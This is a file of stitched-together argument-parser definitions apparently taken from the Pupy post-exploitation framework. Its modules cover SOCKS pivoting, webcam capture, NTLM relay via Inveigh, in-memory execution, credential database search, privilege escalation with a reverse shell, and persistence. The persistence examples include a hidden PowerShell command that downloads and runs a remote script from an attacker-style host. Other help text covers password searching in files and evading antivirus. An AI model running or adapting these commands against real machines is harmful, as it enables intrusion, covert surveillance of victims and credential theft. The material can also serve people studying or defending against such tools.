def init_argparse(cls):
example = """Examples:
>> run forward -L 1234
Open a Socks proxy on local port 1234. Connection output from the target.
>> run forward -CL 1234
Close the local Socks proxy opened on 1234
>> run forward -R 1234
Open a Socks proxy on target (127.0.0.1:1234). Becareful with target's firewal configuration.
>> run forward -CR 1234
Stop the last proxy opened on the target
>> run forward -R 0.0.0.0:1234
Open a Socks proxy on target (0.0.0.0:1234). Need a Socks connection to target_ip:1234.
>> run forward -L 127.0.0.1:1234:192.168.0.2:8000
Local port forwarding. Listen locally on 1234 and connection establishes by the target to 192.168.0.2:8000.
"""
parser = PupyArgumentParser(prog='forward',
description=cls.__doc__,
epilog=example)
actions = parser.add_mutually_exclusive_group(required=True)
actions.add_argument('-CL',
'--cancel-local',
help='Cancel local forwarding (LPORT/LPATH)')
actions.add_argument('-CR',
'--cancel-remote',
help='Cancel remote forwarding (RPORT/RPATH)')
actions.add_argument('-l',
'--list',
default=False,
action='store_true',
help='List forwardings for current client')
actions.add_argument(
'-L',
'--local',
help='Local port forwarding ([LHOST]:LPORT[:RHOST[:[BPORT=]RPORT]])'
'; LPATH:RPATH')
actions.add_argument(
'-R',
'--remote',
help='Remote port forwarding ([RHOST:]RPORT[:LHOST[:[BPORT=]LPORT]])'
'; RPATH:LPATH')
actions.add_argument('-VRL',
'--virtual-remote-listener',
help='Create virtual pupy listener',
metavar=('PORT', 'TRANSPORT'),
nargs=2)
actions.add_argument('-CVRL',
'--cancel-virtual-remote-listener',
metavar='PORT',
help='Disable virtual pupy listener',
type=int)
cls.arg_parser = parser
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='webcam_snap',
description=cls.__doc__)
cls.arg_parser.add_argument(
'-d',
'--device',
type=int,
default=0,
help=
'take a webcam snap on a specific device (default: %(default)s)')
cls.arg_parser.add_argument(
'-n',
'--nb-cameras',
action='store_true',
help='print number of cameras (Android Only)')
cls.arg_parser.add_argument(
'-q',
'--jpg-quality',
type=int,
default=40,
help='define jpg quality (Android Only) (default: %(default)s)')
cls.arg_parser.add_argument(
'-v',
'--view',
action='store_true',
help='directly open eog on the snap for preview')
cls.arg_parser.add_argument(
'-o',
'--output',
type=str,
default="/root/django/users/webcamsnaps",
help='amin ghaemi :) (default: %(default)s)')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='echo', description=cls.__doc__)
cls.arg_parser.add_argument(
'host', type=str, help='IP address of pupy\'s Echo server')
cls.arg_parser.add_argument(
'-n', '--amount', type=int, default=4,
help='Search at least this amount of ports before exit')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="Inveigh",
description=cls.__doc__)
commands = cls.arg_parser.add_subparsers(title='actions')
start = commands.add_parser('start', help='Start Inveigh')
subtype = start.add_mutually_exclusive_group()
subtype.add_argument('-R',
'--relay',
action='store_true',
default=False,
help='Start relay')
start.set_defaults(command='start')
dump = commands.add_parser('get', help='Get Inveigh results')
dump.set_defaults(command='dump')
stop = commands.add_parser('stop', help='Stop Inveigh')
stop.set_defaults(command='stop')
info = commands.add_parser('help',
help='Get help page from Invoke-Inveigh')
info.set_defaults(command='help')
info.add_argument('-R',
'--relay',
action='store_true',
default=False,
help='Help about relay')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='pexec', description=cls.__doc__)
cls.arg_parser.add_argument(
'-n',
action='store_true',
help='Don\'t catch stderr',
)
cls.arg_parser.add_argument(
'-N',
action='store_true',
help='Don\'t receive stdout (read still be done on the other side)',
)
cls.arg_parser.add_argument(
'-s',
action='store_true',
help='Start in shell',
)
cls.arg_parser.add_argument(
'-S', '--set-uid',
help='Set UID (Posix only)',
)
cls.arg_parser.add_argument(
'arguments',
nargs=REMAINDER,
help='CMD args'
)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='pexec',
description=cls.__doc__)
cls.arg_parser.add_argument(
'-n',
action='store_true',
help='Don\'t catch stderr',
)
cls.arg_parser.add_argument(
'-N',
action='store_true',
help='Don\'t receive stdout (read still be done on the other side)',
)
cls.arg_parser.add_argument(
'-s',
action='store_true',
help='Start in shell',
)
cls.arg_parser.add_argument(
'-S',
'--set-uid',
help='Set UID (Posix only)',
)
cls.arg_parser.add_argument(
'arguments',
nargs=REMAINDER,
help='CMD args. You can use ^/local/path^[>|<]/remote/path^ '
'form to upload|download files before|after command')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='tcpdump.py',
description=cls.__doc__)
cls.arg_parser.add_argument("-s",
"--save-pcap",
action="store_true",
help="save to a pcap file")
cls.arg_parser.add_argument("--count",
type=int,
default=0,
help="sniff at max n packets")
cls.arg_parser.add_argument("-i",
"--iface",
default=None,
help="change default iface")
cls.arg_parser.add_argument(
"--timeout",
type=int,
default=None,
help="stop the capture after timeout seconds")
cls.arg_parser.add_argument(
"--bpf",
required=True,
help=
"use a BPF (Warning: It is highly advised to whitelist pupy's shell IP/PORT you are currently using to avoid a nasty Larsen effect)"
) #yup mandatory cause you have to put pupy's IP/PORT anyway
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="netstat", description=cls.__doc__)
cls.arg_parser.add_argument('-l', '--listen', action='store_true', help='Show listening sockets')
cls.arg_parser.add_argument('-t', '--tcp', action='store_true', help='Show TCP')
cls.arg_parser.add_argument('-u', '--udp', action='store_true', help='Show UDP')
cls.arg_parser.add_argument('-s', '--show', nargs='+', default=[], help='Filter by word')
cls.arg_parser.add_argument('-x', '--hide', nargs='+', default=[], help='Filter out by word')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="mkdir",
description=cls.__doc__)
cls.arg_parser.add_argument('dir',
type=str,
help='directory name',
completer=remote_dirs_completer)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="cd", description=cls.__doc__)
cls.arg_parser.add_argument('path',
type=str,
nargs='?',
help='path of a specific directory',
completer=remote_dirs_completer)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="memory_exec",
description=cls.__doc__)
#cls.arg_parser.add_argument('-p', '--process', default='cmd.exe', help='process to start suspended')
cls.arg_parser.add_argument('-i',
'--interactive',
action='store_true',
help='interact with the process stdin.')
cls.arg_parser.add_argument(
'-m',
'--impersonate',
action='store_true',
help=
'use the current impersonated token (to use with impersonate module)'
)
cls.arg_parser.add_argument(
'-s',
'--suspended-process',
default="cmd.exe",
help='change the suspended process to spawn (default: cmd.exe)')
cls.arg_parser.add_argument('-0',
'--argv0',
help='Set argv[0] (linux only)')
cls.arg_parser.add_argument('path',
help='path to the exe',
completer=path_completer)
cls.arg_parser.add_argument(
'args',
nargs=REMAINDER,
help='optional arguments to pass to the exe')
def init_argparse(cls):
example = 'Examples:\n'
example += '>> creds --search gmail\n'
example += '>> creds --search plaintext\n'
example += '>> creds --search hash\n'
example += '>> creds --search <UID>\n'
example += '>> creds --sort --search plaintext\n'
cls.arg_parser = PupyArgumentParser(prog="Creds",
description=cls.__doc__,
epilog=example)
cls.arg_parser.add_argument(
'-s',
'--search',
default="all",
metavar='string',
help=
'default: all (search in any possible field, plaintext or hash word can be specify)'
)
cls.arg_parser.add_argument('--sort',
action='store_true',
default=False,
help='sort by host')
cls.arg_parser.add_argument('--flush',
'-F',
action='store_true',
help='flush the entire database')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="tts",
description=cls.__doc__)
cls.arg_parser.add_argument('--lang',
default='US',
help='change the locale')
cls.arg_parser.add_argument('text', help='text to speak out loud')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="dns",
description=cls.__doc__)
cls.arg_parser.add_argument('targets',
type=str,
nargs='+',
help='Domain name or IP address')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='usniper',
description=cls.__doc__)
commands = cls.arg_parser.add_subparsers(help='commands')
start = commands.add_parser('start', help='Start USniper')
start.add_argument('-S',
'--string',
action='store_true',
default=False,
help='Dereference as string (>3.18)')
start.add_argument('-R',
'--ret',
action='store_true',
default=False,
help='Get value after return')
start.add_argument('-C',
'--nochar',
action='store_true',
default=False,
help='Do not cast register to character')
start.add_argument('path', help='Absolute path to binary')
start.add_argument('offset', help='Offset in binary')
start.add_argument('reg',
default='ax',
nargs='?',
help='Get value from register')
start.set_defaults(func=cls.start)
stop = commands.add_parser('stop', help='stop USniper')
stop.set_defaults(func=cls.stop)
dump = commands.add_parser('dump', help='dump results')
dump.set_defaults(func=cls.dump)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="zip", description=cls.__doc__)
cls.arg_parser.add_argument('source', type=str, help='path of the source file or directory to zip')
cls.arg_parser.add_argument('-l', action='store_true', help='list file (default: zip file)')
cls.arg_parser.add_argument('-u', action='store_true', help='unzip file (default: zip file)')
cls.arg_parser.add_argument('-d', dest='destination', help='path of the destination file (default: current directory)')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='http',
description=cls.__doc__)
cls.arg_parser.add_argument(
'-H',
'--header',
default=[],
action='append',
help='User-Agent=Mozilla X-Forwarded-For=127.0.0.1')
cls.arg_parser.add_argument('-P',
'--proxy',
help='Proxy URI (socks://127.0.0.1:1234)')
cls.arg_parser.add_argument('-o', '--output', help='Output to file')
cls.arg_parser.add_argument('-i',
'--input',
help='Input from file (POST)')
cls.arg_parser.add_argument('-v',
'--verify',
default=False,
action='store_true',
help='Verify certificate')
cls.arg_parser.add_argument('-r',
'--follow-redirects',
default=False,
action='store_true',
help='Follow redirects')
cls.arg_parser.add_argument('url', help='url')
cls.arg_parser.add_argument('data',
nargs='*',
default=[],
help='Data (POST/urlencode)')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='write',
description=cls.__doc__)
modifier = cls.arg_parser.add_mutually_exclusive_group()
modifier.add_argument('-0',
'--zero',
action='store_true',
default=False,
help='Overwrite file with empty string')
modifier.add_argument('-a',
'--append',
action='store_true',
default=False,
help='Append data to existing content')
decoding = cls.arg_parser.add_mutually_exclusive_group()
decoding.add_argument('-x',
'--hex',
action='store_true',
default=False,
help='Decode data from hex')
decoding.add_argument('-b',
'--base64',
action='store_true',
default=False,
help='Decode data from base64')
cls.arg_parser.add_argument('remote_file',
metavar='<remote_path>',
completer=remote_path_completer)
cls.arg_parser.add_argument('text', nargs=REMAINDER)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="persistence",
description=cls.__doc__)
cls.arg_parser.add_argument('-s',
'--shared',
action='store_true',
default=False,
help='prefer shared object (linux only)')
cls.arg_parser.add_argument(
'-p',
dest='payload',
help='remote path or cmd to execute at login (windows only)',
completer=remote_path_completer)
cls.arg_parser.add_argument('-n',
dest='name',
help='custom name to use (windows only)')
cls.arg_parser.add_argument(
'-m',
dest='method',
help=
"should be an ID, get the list (-l) scanning which methods are possible (windows only)"
)
cls.arg_parser.add_argument(
'-l',
dest='scan',
action='store_true',
default=False,
help="list all possible techniques for this host (windows only)")
cls.arg_parser.add_argument('--remove',
action='store_true',
help='remove persistence',
default=False)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='logs',
description=cls.__doc__)
cls.arg_parser.add_argument(
'-n',
'--number',
type=int,
default=10,
help='Show last n records of each category (if applicable)')
cls.arg_parser.add_argument('-i',
'--include',
action='append',
default=[],
help='Add regex to include content')
cls.arg_parser.add_argument('-x',
'--exclude',
action='append',
default=[],
help='Add regex to exclude content')
cls.arg_parser.add_argument('-t',
'--time',
action='store_true',
default=False,
help='Show time')
cls.arg_parser.add_argument('-w',
'--width',
action='store_true',
default=False,
help='Show full content')
def init_argparse(cls):
example = 'Examples:\n'
example += '>> run persistence -c "powershell.exe -w hidden -noni -nop -c \\\"iex(New-Object System.Net.WebClient).DownloadString(\'http://192.168.0.15:8080/eiloShaegae1\')\\\""\n'
example += '>> run persistence -e \'/tmp/pupy.exe\' -m wmi\n'
example += '>> run persistence -m wmi --remove\n'
cls.arg_parser = PupyArgumentParser(prog="persistence",
description=cls.__doc__,
epilog=example)
cls.arg_parser.add_argument(
'-e',
'--exe',
help='Use an alternative file and set persistency',
completer=path_completer)
cls.arg_parser.add_argument('-c',
'--cmd',
help='Use a command instead of a file')
cls.arg_parser.add_argument('-s',
'--shared',
action='store_true',
default=False,
help='prefer shared object')
cls.arg_parser.add_argument(
'--remove',
action='store_true',
help='try to remove persistency instead of enabling it')
cls.arg_parser.add_argument(
'-m',
'--method',
choices=['startup', 'registry', 'wmi'],
default=None,
help=
'change the default persistency method. This argument is ignored on linux'
)
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="kill",
description=cls.__doc__)
cls.arg_parser.add_argument('pids',
type=int,
nargs='+',
help='pids to kill')
def init_argparse(cls):
parser = PupyArgumentParser(prog='rfs', description=cls.__doc__)
commands = parser.add_subparsers(dest='command')
mount = commands.add_parser('mount')
mount.add_argument('src', help='Remote directory')
mount.add_argument('dest', help='Local mount point')
mount.set_defaults(func=cls.mount)
umount = commands.add_parser('umount')
umount.add_argument('dest', help='Local mount point')
umount.set_defaults(func=cls.umount)
mlist = commands.add_parser('list')
mlist.set_defaults(func=cls.list)
cls.arg_parser = parser
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="getsystem", description=cls.__doc__)
cls.arg_parser.add_argument("--prog", default="cmd.exe", help="Change the default process to create/inject into")
cls.arg_parser.add_argument('-m', dest='migrate', action='store_true', default=True, help="Used by default: migrate to the system process (could be detected by AV)")
cls.arg_parser.add_argument('-r', dest='restart', action='store_true', default=False, help="Restart current executable as admin")
cls.arg_parser.add_argument('-p', dest='powershell', action='store_true', default=False, help="Use powershell to automatically get a reverse shell")
cls.arg_parser.add_argument('-k', dest='keep', action='store_true', default=False, help="Keep this current connection after migration (default: %(default)s)")
cls.arg_parser.add_argument('-t', dest='timeout', default=60, type=int, help="Wait n seconds a reverse connection during migration (default: %(default)s)")
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='users',
description=cls.__doc__)
cls.arg_parser.add_argument('-g',
'--groups',
action='store_true',
default=False,
help='show groups membership')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="getprivs",
description=cls.__doc__)
cls.arg_parser.add_argument(
'--get-debug',
dest='getdebug',
action='store_true',
help="Try to get SeDebugPrivilege for the current process")
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog='stat',
description=cls.__doc__)
cls.arg_parser.add_argument('path',
type=str,
nargs=REMAINDER,
help='path of a specific file',
completer=remote_path_completer)
def init_argparse(cls):
example = 'Examples:\n'
example += '- Recursively search strings in files:\n'
example += '>> run search .*ini passw.*=.*\n'
example += '>> run search .* passw.*=.* -I\n'
example += '- Recursively search string in file names:\n'
example += '>> run search pwdfile.*\n'
cls.arg_parser = PupyArgumentParser(prog="search",
description=cls.__doc__,
epilog=example)
cls.arg_parser.add_argument(
'-p',
'--path',
default='.',
completer=remote_path_completer,
help='root path to start (default: current path)')
cls.arg_parser.add_argument('-m',
'--max-size',
type=int,
default=20000000,
help='max file size (default 20 Mo)')
cls.arg_parser.add_argument('-b',
'--binary',
action='store_true',
help='search content inside binary files')
cls.arg_parser.add_argument('-C',
'--content-only',
action='store_true',
help='show only results with content')
cls.arg_parser.add_argument('-L',
'--links',
action='store_true',
help='follow symlinks')
cls.arg_parser.add_argument('-D',
'--download',
action='store_true',
help='download found files (imply -N)')
cls.arg_parser.add_argument(
'-N',
'--no-content',
action='store_true',
help='if string matches, output just filename')
cls.arg_parser.add_argument('-I',
'--insensitive',
action='store_true',
default=False,
help='no case sensitive')
cls.arg_parser.add_argument('filename',
type=str,
metavar='filename',
help='regex to search (filename)')
cls.arg_parser.add_argument('strings',
nargs='*',
default=[],
type=str,
metavar='string',
help='regex to search (content)')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(description=cls.__doc__)
cls.arg_parser.add_argument('-c', '--codepage', help="Decode output with encoding")
cls.arg_parser.add_argument('-T', action='store_true', dest='pseudo_tty', help="Disable tty allocation")
cls.arg_parser.add_argument('-S', '--su', help='Try to change uid (linux only)')
cls.arg_parser.add_argument('-R', default='asciinema', dest='recorder',
choices=['ttyrec', 'asciinema', 'asciinema1', 'none'],
help="Change tty recorder")
cls.arg_parser.add_argument('program', nargs=REMAINDER, help='Execute in shell')
def init_argparse(cls):
cls.arg_parser = PupyArgumentParser(prog="cat", description=cls.__doc__)
cls.arg_parser.add_argument('-N', type=int, help='Tail lines')
cls.arg_parser.add_argument('-n', type=int, help='Head lines')
cls.arg_parser.add_argument('-G', type=str, help='Grep sequence')
cls.arg_parser.add_argument('-E', type=str, help='Set encoding of text file')
cls.arg_parser.add_argument(
'-C', '--color', action='store_true', help='Enable coloring (pygments)')
cls.arg_parser.add_argument('path', type=str, completer=remote_path_completer)
